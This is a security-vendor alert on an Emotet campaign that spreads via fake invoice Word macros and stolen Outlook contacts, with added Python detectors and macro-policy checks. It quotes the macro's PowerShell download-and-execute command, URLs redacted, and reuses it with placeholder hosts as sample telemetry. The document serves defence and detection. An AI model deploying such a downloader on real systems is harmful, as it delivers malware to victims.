Security Alert
Jonathan Crowe
Jul 2017

Emotet Trojan Reads Your Email, Uses it to Infect More Victims

Not only does the latest version of Emotet steal a variety of credentials from its victims, it also raids their Outlook account for names and email addresses, then uses them to send out spam messages designed to spread the infection.

Key Details

  • What's happening?

    A new wave of Emotet trojan infections is spreading via phishing emails sent from compromised Outlook accounts. 

  • What do the phishing emails look like?

    The emails are disguised to look like invoice notices sent by contacts the recipient has emailed in the past, perhaps even recently. They include a link that downloads a malicious Word document. 

  • What is Emotet?

    Emotet has traditionally been recognized as a banking trojan, though in this case it appears to be serving as more of a general credential stealer and potentially a downloader for additional malware.

  • Barkly blocks these attacks before Emotet can even be downloaded

    These attacks rely on an Office macro hidden in the "invoice" Word doc to download the Emotet payload using a PowerShell command. Barkly sees that suspicious behavior and blocks it before the command can be completed. Watch for yourself in the video below:

  • Additional ways to protect your company:

    Phishing emails with fake invoices aren't exactly a new threat, but when they come from a vendor your company uses they can be convincing. Share this alert with your users so they can be especially wary of this threat, and if possible, consider disabling macros by default across your organization.



New Emotet campaigns use victim email accounts to spread the infection

A new wave of phishing emails has been spotted this week distributing Emotet, a credential-stealing trojan that has been ramping up activity and evolving since May.

At first glance, these appear to be a fairly run-of-the-mill phishing campaign, complete with booby-trapped Word documents disguised as invoices. On further investigation, however, Emotet is taking things a step further: it scrapes names and email addresses from victim Outlook accounts, then uses that information to send additional phishing emails from the compromised accounts.

As a result, the emails in these campaigns look as though they were sent by a contact the recipient knows and has emailed in the past. That naturally increases their effectiveness. Earlier this week Barkly prevented an infection at one of our customers, where an employee opened the email below and clicked its link:


There are plenty of flags here that security awareness programs can train users to recognize, but the simple fact is because the email appeared to be from a vendor the recipient knew, it was instantly more credible.

Clicking the link in the email downloaded a Microsoft Word document that told the user to enable macros in order to view it.


Once enabled, a macro in the Word doc attempted to launch the following PowerShell command, designed to grab the Emotet payload from one of several compromised websites. It is shown here with line breaks and comments added for readability; the list of payload URLs was redacted from the alert, which is why the $urls string is empty.

    powershell -WindowStyle Hidden
      $wscript = new-object -ComObject WScript.Shell;     # created but never used
      $webclient = new-object System.Net.WebClient;
      $random = new-object random;
      $urls = ',,,,'.Split(',');                          # hosting URLs redacted
      $name = $random.next(1, 65536);                     # random file name
      $path = $env:temp + '\' + $name + '.exe';           # dropped into %TEMP%
      foreach($url in $urls){
        try{
          $webclient.DownloadFile($url.ToString(), $path);
          Start-Process $path;                            # run the first one that downloads
          break;
        }catch{
          write-host $_.Exception.Message;                # on failure, try the next URL
        }
      }

At this point, Barkly's behavior analysis noticed the macro attempting to do something it shouldn't and immediately shut down the attack. By blocking the command from executing, Barkly prevented the Emotet payload from even touching the machine. 
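
The macro-to-PowerShell hand-off above is the point where behavior-based blocking has something concrete to key on. What follows is an added example (my code, not Barkly's product and not from the original alert) of that logic in Python, run over constructed process-creation records shaped like Sysmon Event ID 1 fields. It looks for an Office parent spawning PowerShell with a hidden window, a WebClient download, an .exe written under %TEMP% and a Start-Process, pulls the download URLs out of the $urls list for blocklisting, and also unpacks -EncodedCommand, which goes beyond the plain-text command on this page. The example.invalid URLs, the file paths and all three events are made up.

```python
# Added example (not Barkly's code): flag the Office -> PowerShell downloader
# pattern from the Emotet macro in process-creation telemetry. The event
# records are constructed, shaped like Sysmon Event ID 1 fields; the
# example.invalid URLs and paths are made up.
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Behaviours of the command the macro launched. -EncodedCommand handling is an
# extension: the page's sample is plain text, but encoded variants are common.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "webclient_download": re.compile(r"System\.Net\.WebClient|\.DownloadFile\(", re.I),
    "exe_in_temp": re.compile(r"\$env:temp\s*\+.*?\.exe", re.I),
    "start_process": re.compile(r"Start-Process", re.I),
}
URL_LIST = re.compile(r"\$urls\s*=\s*'([^']*)'\.Split\(','\)", re.I)
ENCODED = re.compile(r"-e(?:nc|ncoded|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def encode_for_powershell(script: str) -> str:
    """Base64 of UTF-16LE text, the form PowerShell accepts after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def expand_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand body so the indicator regexes see the real script."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def extract_payload_urls(cmdline: str) -> list:
    """Recover the download URLs from the $urls = '...'.Split(',') list; empty entries dropped."""
    m = URL_LIST.search(cmdline)
    return [u for u in m.group(1).split(",") if u] if m else []


def assess(event: dict) -> dict:
    """Score one process-creation event: 'block' when an Office parent spawns a PowerShell
    downloader, 'alert' when two or more indicators fire under any parent, else 'allow'."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = expand_encoded_command(event["CommandLine"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    office_child = parent in OFFICE_PARENTS and image in POWERSHELL
    if office_child and hits:
        verdict = "block"
    elif len(hits) >= 2:
        verdict = "alert"
    else:
        verdict = "allow"
    return {"verdict": verdict, "indicators": hits,
            "urls": extract_payload_urls(cmd), "office_child": office_child}


# Constructed sample telemetry (not real events). The first command line is the
# one from the macro in this alert, with made-up hosting URLs in place of the
# redacted list; the second is an encoded variant; the third is benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;"
                    "$webclient = new-object System.Net.WebClient;$random = new-object random;"
                    "$urls = 'http://example.invalid/a,http://example.invalid/b'.Split(',');"
                    "$name = $random.next(1, 65536);$path = $env:temp + '\\' + $name + '.exe';"
                    "foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);"
                    "Start-Process $path;break;}catch{write-host $_.Exception.Message;}}"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc " + encode_for_powershell(
         "$w=new-object System.Net.WebClient;"
         "$w.DownloadFile('http://example.invalid/c',$env:temp+'\\x.exe');"
         "Start-Process ($env:temp+'\\x.exe')")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile Get-ChildItem $env:temp"},
]


def triage(events: list) -> list:
    """Return [(verdict, urls)] per event, the shape a blocking hook or a SIEM rule would consume."""
    return [(a["verdict"], a["urls"]) for a in map(assess, events)]


if __name__ == "__main__":
    for event, (verdict, urls) in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        parent = event["ParentImage"].rsplit("\\", 1)[-1]
        print(f"{verdict:5}  parent={parent}  urls={urls}")
```

Run on its own it prints a verdict per sample event. The threshold rule (block on any indicator under an Office parent, alert on two or more elsewhere) is a starting point, not a tuned policy; whatever you feed it must carry the full command line, so enable command-line auditing for Security event 4688 or deploy Sysmon, or the detection has nothing to read.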

Blocking Emotet before it lands on a device is crucial, because once there it has several tricks up its sleeve designed to spread the infection laterally inside the organization and externally as well.


Abusing victim email accounts to send more phishing emails

According to analysis from Fortinet, once it has set up shop on an infected device, one of Emotet's tasks is to scour the victim's Microsoft Outlook account by reading the PST file, which stores email messages, calendar info, and more. It specifically homes in on email messages with an unread status, and collects the sender name and email address from each unread message.

The stolen names and email addresses are stored in a temporary file, then encrypted and delivered to a command and control (C&C) server.

The C&C server responds by sending back the phishing email message along with the email addresses the message will be sent to. From there, Emotet uses SMTP to send out the emails, keeping the campaign alive and spreading to new victims.

Emotet doesn't stop there, however. It continues the attack on the original infected device by stealing additional account credentials, including but not limited to:

  • Google accounts
  • Office Outlook
  • FTP accounts saved in IE
  • MSN Messenger
  • Google Talk
  • IncrediMail
  • Group Mail
  • Mozilla Thunderbird

Lateral movement

Researchers from Fidelis Security have also observed recent variants of Emotet exercising internal network propagation capabilities similar to the QakBot banking trojan. These mostly rely on brute-forcing credentials for any shares or accounts that allow it to write a file and create a remote service, which it tries to disguise under the name "Windows Defender System Service". The service then writes Emotet to the remote computer and executes it.

If successful, this propagation technique significantly raises the impact of an Emotet infection. Rather than dealing with a single compromised machine, you could have infections throughout the organization to deal with.

Even if it isn't successful, because brute-forcing is involved, infections also introduce the risk of account lockouts en masse (a major problem seen with QakBot infections earlier this year).
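
Both behaviors described above leave ordinary Windows event log evidence, so they can be hunted for without Fidelis' own tooling. The following is an added example (my code, not Fidelis' or Barkly's) that scans constructed, forwarded events for a System log 7045 (new service installed) whose name is the "Windows Defender System Service" disguise or whose binary sits in a user-writable directory, and for a single source failing logons (Security 4625) against many accounts within a few minutes, joined to the 4740 lockouts that follow. The hostnames, addresses, account names and the service image path are made up.

```python
# Added example (not Fidelis' or Barkly's code): hunt for the propagation
# behaviour described above in forwarded Windows events: a new service named
# "Windows Defender System Service" (System log 7045) and a burst of failed
# logons from one source (Security 4625), with any resulting lockouts (4740).
# All events, hosts, accounts and addresses below are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

DISGUISED_SERVICE = "windows defender system service"
# The real Defender engine registers as "WinDefend"; any other Defender-themed
# name in a 7045 is worth a look, and an image under a user-writable path more so.
WRITABLE_HINTS = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")


def find_rogue_services(events: list) -> list:
    """Return 7045 events whose service name or binary location matches the Emotet pattern."""
    findings = []
    for e in events:
        if e["EventID"] != 7045:
            continue
        name = e["ServiceName"].strip().lower()
        reasons = []
        if name == DISGUISED_SERVICE:
            reasons.append("service name is the Emotet disguise")
        elif "defender" in name and name != "windefend":
            reasons.append("Defender-themed name not registered as WinDefend")
        if any(h in e["ImagePath"].lower() for h in WRITABLE_HINTS):
            reasons.append("service binary under a user-writable directory")
        if reasons:
            findings.append({"host": e["Computer"], "service": e["ServiceName"], "reasons": reasons})
    return findings


def find_brute_force(events: list, window=timedelta(minutes=5), min_accounts=10) -> list:
    """Flag a source that fails logons against min_accounts distinct accounts inside one window,
    and list which of those accounts a 4740 shows were locked out as a result."""
    failures = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            failures[e["IpAddress"]].append((e["Time"], e["TargetUserName"]))
    locked = {e["TargetUserName"] for e in events if e["EventID"] == 4740}
    findings = []
    for source, attempts in failures.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            accounts = {user for t, user in attempts[i:] if t - start <= window}
            if len(accounts) >= min_accounts:
                findings.append({"source": source, "accounts": len(accounts),
                                 "locked_out": sorted(accounts & locked),
                                 "first_seen": start.isoformat()})
                break
    return findings


def build_sample_events() -> list:
    """Constructed telemetry: one disguised service, the real WinDefend, a brute-force run
    from 10.0.0.23 across 12 accounts that locks two of them, and one innocent failure."""
    t0 = datetime(2017, 7, 26, 9, 0, 0)
    events = [
        {"EventID": 7045, "Computer": "FS01", "ServiceName": "Windows Defender System Service",
         "ImagePath": r"C:\Windows\Temp\tmp.exe"},
        {"EventID": 7045, "Computer": "FS01", "ServiceName": "WinDefend",
         "ImagePath": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
    ]
    for i in range(12):
        events.append({"EventID": 4625, "Time": t0 + timedelta(seconds=3 * i),
                       "IpAddress": "10.0.0.23", "TargetUserName": f"user{i:02d}"})
    events += [{"EventID": 4740, "TargetUserName": "user03"},
               {"EventID": 4740, "TargetUserName": "user07"},
               {"EventID": 4625, "Time": t0, "IpAddress": "10.0.0.50", "TargetUserName": "alice"}]
    return events


if __name__ == "__main__":
    sample = build_sample_events()
    for finding in find_rogue_services(sample) + find_brute_force(sample):
        print(finding)
```

The window and account threshold are deliberately loose; tune them against your own baseline of helpdesk and service-account noise. The lockout join is the useful part during response: the accounts it lists are the ones to unlock once the source host is contained, and the source address is the first machine to image.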

Protecting your company from Emotet

Phishing emails disguised as fake invoices are nothing new, but when they look like they're coming from a vendor your company actually does business with, they can be convincing. 

Sharing this alert with your users so they can be especially wary of this threat is a good place to start, but you should also take steps to ensure you're prepared for any mistakes or unfortunate clicks that do happen.

If possible, consider disabling macros by default across your organization. Explain to users that when a document they download from an email asks them to enable macros or "enable content" that's a major red flag.
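
What "disabling macros by default" means in practice is a Group Policy value, and it is worth knowing which one. The following is an added example (not from the original alert) that assesses the Word macro policy values under HKCU\Software\Policies\Microsoft\Office\16.0\Word\Security, with a weak, unmanaged snapshot beside the hardened one. The two snapshots are constructed; the key path and value names are the real Office 2016 policy settings, and on a Windows host the helper reads the live values.

```python
# Added example (not the page's own): check Word's macro policy, with the weak
# default beside the hardened setting. The key path and value names are the
# Office 2016 Group Policy registry settings; the two snapshots are constructed.
import sys

POLICY_KEY = r"Software\Policies\Microsoft\Office\16.0\Word\Security"  # under HKCU
VBA_WARNINGS = {
    1: "enable all macros",
    2: "disable all macros with notification (Office's own default)",
    3: "disable all except digitally signed macros",
    4: "disable all macros without notification",
}
WANTED = ("VBAWarnings", "blockcontentexecutionfromInternet")


def assess_macro_policy(values: dict) -> list:
    """Findings for one policy snapshot; an empty list means users cannot 'Enable Content' their way in."""
    findings = []
    level = values.get("VBAWarnings")
    if level is None:
        findings.append("VBAWarnings not enforced: users see the 'Enable Content' bar and can click it")
    elif level in (1, 2):
        findings.append(f"VBAWarnings={level} ({VBA_WARNINGS[level]}): the user can still run the macro")
    if values.get("blockcontentexecutionfromInternet") != 1:
        findings.append("blockcontentexecutionfromInternet != 1: macros in files downloaded "
                        "from the Internet are not blocked outright")
    return findings


def read_policy_from_registry() -> dict:
    """On Windows, read the live HKCU values (no admin rights needed); elsewhere return {}."""
    if sys.platform != "win32":
        return {}
    import winreg
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, POLICY_KEY) as key:
            for name in WANTED:
                try:
                    values[name] = winreg.QueryValueEx(key, name)[0]
                except FileNotFoundError:
                    continue
    except FileNotFoundError:
        pass
    return values


# Constructed snapshots: an unmanaged workstation (nothing set by policy) and the
# setting this alert recommends. Excel and PowerPoint use the same value names
# under their own Security keys.
WEAK = {}
HARDENED = {"VBAWarnings": 4, "blockcontentexecutionfromInternet": 1}

if __name__ == "__main__":
    snapshots = [("weak", WEAK), ("hardened", HARDENED)]
    if sys.platform == "win32":
        snapshots.append(("this machine", read_policy_from_registry()))
    for label, snapshot in snapshots:
        print(label, assess_macro_policy(snapshot) or ["ok"])
```

VBAWarnings=4 is the strongest setting but silently breaks every macro-driven workflow; where signed internal macros must keep working, 3 (signed only) combined with trusted locations is the usual compromise. blockcontentexecutionfromInternet=1 on its own would still stop the invoice document in this alert, because a file downloaded through the browser carries the Mark of the Web.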

Making sure AV is installed and up-to-date across your organization is another must, but for more complete protection you should also have endpoint protection that detects and blocks malicious behaviors.

At the time of this writing, this new variant of Emotet has a very low detection rate among traditional security products. The customer Barkly protected on Wednesday was running a major AV solution that missed the attack completely. Learn more about how Barkly complements AV and fills in the gaps in AV protection.

SHA256 hash: 



Jonathan covers the latest threats and cybersecurity trends from a practical perspective.

